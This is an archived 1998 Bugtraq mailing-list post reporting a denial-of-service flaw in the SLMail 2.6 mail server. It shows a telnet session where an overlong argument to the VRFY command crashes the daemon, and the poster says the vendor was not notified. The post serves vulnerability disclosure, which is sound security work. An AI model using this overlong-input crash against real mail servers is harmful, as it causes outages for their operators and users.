Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_1

Bugtraq archives for 1st quarter (Jan-Mar) 1998: SLMail 2.6 DoS

SLMail 2.6 DoS

Steven (stevenEFNI.COM)
Wed, 11 Mar 1998 20:44:56 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Jon: "SLMail 2.6 DoS - Imail also"
Previous message: Tony Hagale: "Fwd: Sun Security Bulletin #00166"

Hello,

        I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash.  I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$

        It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.

Later,

Cisc0  Undernet
stevenefni.com

Next message: Jon: "SLMail 2.6 DoS - Imail also"
Previous message: Tony Hagale: "Fwd: Sun Security Bulletin #00166"